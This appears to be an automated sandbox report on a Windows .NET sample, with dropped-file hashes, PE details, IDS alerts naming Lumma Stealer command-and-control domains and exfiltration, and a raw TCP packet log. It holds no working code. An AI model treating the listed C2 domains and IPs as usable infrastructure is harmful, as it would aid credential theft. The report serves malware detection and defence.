Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636769" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Armanivenntii_crypted_EASY.exe.log

Download File

Process:	C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\d3d9x.dll

Download File

Process:	C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	484352
Entropy (8bit):	7.079270254749303
Encrypted:	false
SSDEEP:	6144:VmbiqDG2YZiamonYNqSY9h1cflWQ+pGDv6xWXa0ewRs8SODY+CxJUx4x2DHKu+d9:VmhCLiamonRolXb6x8a0BLSODewKue
MD5:	8858D2B92C921BBE7126A9048B430BF5
SHA1:	AC24CDB9D5B8B4C0135AFDED7FAA31E000929C95
SHA-256:	1F761A57FE057D88BECDC441D4AAE37029DDBC1CD808AB2F838DCCE76E869717
SHA-512:	FC471CBAA3834C1C3F51C126B3FB7703B42C92B88C4489B9B6D913DD8AE604BF7ED177DA1224B522C0A39C7C1CC671CD2A1C52E04D44E3EBDDD968C970CD996C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!...&."...........v.......@............................................@.............................\|.......<.......................................................................@............@..L............................text....!.......".................. ..`.rdata...i...@...j...&..............@..@.data....-.......$..................@..../Wm............................... ..`.reloc...............H..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466387041775699
Encrypted:	false
SSDEEP:	6144:nIXfpi67eLPU9skLmb0b4qWSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSb/:IXD94qWlLZMM6YFHq+/
MD5:	AAA395EA52AB4C34644F6AEB3B97D168
SHA1:	2CF724802AA09E061148FC340D908B5ABAB40D65
SHA-256:	CBD6C411EA054E0C2F64030699FD4010E322C1968EBE5255FE6094C25AFEA261
SHA-512:	152C23EF2AA70F1CC4CBBFD2BA95D53CC60E950BF9EF646DAC5D2EC7D906C888963B81E94B51DEF2B332DC6A1F4E750FA1884D0E8A8838DDBF5F0D996E55BAF5
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[YSQ..............................................................................................................................................................................................................................................................................................................................................O.Lm........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.963563761483557
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Armanivenntii_crypted_EASY.exe
File size:	641'536 bytes
MD5:	795197155ca03f53eed7d90a2613d2a7
SHA1:	e177b0c729b18f21473df6decd20076a536e4e05
SHA256:	9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
SHA512:	4aff1b1d26b5d3389d8deb0b9b428f4e81daa9d530e37cb3064d33c243407dbf73a218367ba4fa2138b068fc40b5588d5d4ae4849a921ea5e407ad4d3610084b
SSDEEP:	12288:jxTG8RXxXVgi53Yq9Nmq0/iCZDmzMTnTVErJAe/xi9Gz4HLrvE8zt6wgRTZOY/gG:jxTH5HNm5/ipzP
TLSH:	1ED460DD766072DFC85BC872CEA81D64EB6134BB831B5203A06716EDAA4D897CF141F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x49dbfe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BE9DB1 [Fri Aug 16 00:30:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9dbb0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x698	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9bc04	0x9be00	fd5b6a099c792dc255f68a3556496e8b	False	0.6575014409582999	data	6.970733999325173	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0x698	0x800	291712881ed039349b2f8a38cbe41932	False	0.36181640625	data	3.655393384230362	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0xc	0x200	2761f26c69dcd02d5fddac43c91057fd	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x9e0a0	0x40c	data			0.4189189189189189
RT_MANIFEST	0x9e4ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T14:46:36.278477+0100	2054790	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weaknessmznxo .shop)	1	192.168.2.4	52043	1.1.1.1	53	UDP
2024-12-18T14:46:36.582167+0100	2055301	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop)	1	192.168.2.4	54063	1.1.1.1	53	UDP
2024-12-18T14:46:36.816300+0100	2055299	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop)	1	192.168.2.4	49960	1.1.1.1	53	UDP
2024-12-18T14:46:37.043038+0100	2055293	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop)	1	192.168.2.4	51995	1.1.1.1	53	UDP
2024-12-18T14:46:37.349272+0100	2055291	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (cagedwifedsozm .shop)	1	192.168.2.4	51450	1.1.1.1	53	UDP
2024-12-18T14:46:37.578557+0100	2055297	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deicedosmzj .shop)	1	192.168.2.4	62972	1.1.1.1	53	UDP
2024-12-18T14:46:37.868270+0100	2055303	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (southedhiscuso .shop)	1	192.168.2.4	61376	1.1.1.1	53	UDP
2024-12-18T14:46:38.089179+0100	2055295	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (consciousourwi .shop)	1	192.168.2.4	56837	1.1.1.1	53	UDP
2024-12-18T14:46:38.319716+0100	2055307	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weiggheticulop .shop)	1	192.168.2.4	58571	1.1.1.1	53	UDP
2024-12-18T14:46:40.141083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	23.55.153.106	443	TCP
2024-12-18T14:46:40.902599+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49731	23.55.153.106	443	TCP
2024-12-18T14:46:42.722528+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-18T14:46:44.969235+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-18T14:46:44.969235+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-18T14:46:46.202441+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-18T14:46:53.381370+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-18T14:46:53.381370+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-18T14:46:54.945532+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-18T14:46:59.011555+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-18T14:47:00.482296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	172.67.157.254	443	TCP
2024-12-18T14:47:05.081834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	172.67.157.254	443	TCP
2024-12-18T14:47:10.368912+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	172.67.157.254	443	TCP
2024-12-18T14:47:13.323735+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	172.67.157.254	443	TCP
2024-12-18T14:47:16.248484+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 14:46:38.699225903 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:38.699285030 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:38.699361086 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:38.702095985 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:38.702117920 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.141004086 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.141083002 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.144470930 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.144479036 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.144785881 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.185607910 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.210010052 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.255330086 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902627945 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902662039 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902694941 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902714968 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902739048 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902746916 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.902776957 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:40.902796984 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:40.902825117 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.079327106 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.079382896 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.079423904 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.079446077 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.079485893 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.110151052 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.110213995 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.110239029 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.110244036 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.110285044 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.118897915 CET	49731	443	192.168.2.4	23.55.153.106
Dec 18, 2024 14:46:41.118921041 CET	443	49731	23.55.153.106	192.168.2.4
Dec 18, 2024 14:46:41.422142029 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:41.422184944 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:41.422252893 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:41.422665119 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:41.422679901 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:42.722301006 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:42.722527981 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:42.725071907 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:42.725083113 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:42.725316048 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:42.726591110 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:42.726615906 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:42.726646900 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.969191074 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.969279051 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.969355106 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.969641924 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.969666004 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.969677925 CET	49732	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.969682932 CET	443	49732	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.973639011 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.973685026 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:44.973757029 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.974087954 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:44.974101067 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:46.202330112 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:46.202440977 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:46.240297079 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:46.240319014 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:46.241204977 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:46.242422104 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:46.242477894 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:46.242575884 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.381373882 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.381453037 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.381505013 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.381598949 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.381618977 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.381686926 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.389286995 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.397707939 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.397770882 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.397780895 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.406507969 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.410543919 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.410571098 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.415354013 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.418601036 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.418616056 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.466864109 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.500912905 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.546288967 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.572824001 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.577403069 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.577455997 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.577471972 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.577516079 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.577714920 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.578305960 CET	49733	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.578315973 CET	443	49733	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.733616114 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.733668089 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:53.733905077 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.734277010 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:53.734293938 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:54.945405960 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:54.945532084 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:54.946974039 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:54.946980953 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:54.947232008 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:54.948652983 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:54.948808908 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:54.948846102 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:54.948920012 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:54.948929071 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:59.011632919 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:59.011941910 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:59.012005091 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:59.024312973 CET	49735	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:59.024324894 CET	443	49735	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:59.260644913 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:59.260678053 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:46:59.260826111 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:59.261198044 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:46:59.261217117 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:00.482166052 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:00.482295990 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:00.483839989 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:00.483844995 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:00.484146118 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:00.493776083 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:00.493947029 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:00.493974924 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:03.434350967 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:03.434463978 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:03.434632063 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:03.435252905 CET	49740	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:03.435271978 CET	443	49740	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:03.840703011 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:03.840754986 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:03.840950966 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:03.841192961 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:03.841202974 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:05.081713915 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:05.081834078 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:05.085959911 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:05.085971117 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:05.086219072 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:05.094851971 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:05.095072031 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:05.095107079 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:05.095217943 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:05.095230103 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:08.324103117 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:08.324405909 CET	443	49742	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:08.324528933 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:08.324549913 CET	49742	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:09.152360916 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:09.152411938 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:09.152496099 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:09.152844906 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:09.152863026 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:10.368797064 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:10.368911982 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:10.370497942 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:10.370513916 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:10.370775938 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:10.396683931 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:10.396770954 CET	49743	443	192.168.2.4	172.67.157.254
Dec 18, 2024 14:47:10.396830082 CET	443	49743	172.67.157.254	192.168.2.4
Dec 18, 2024 14:47:11.299897909 CET	443	49743	172.67.157.254	192.168.2.4
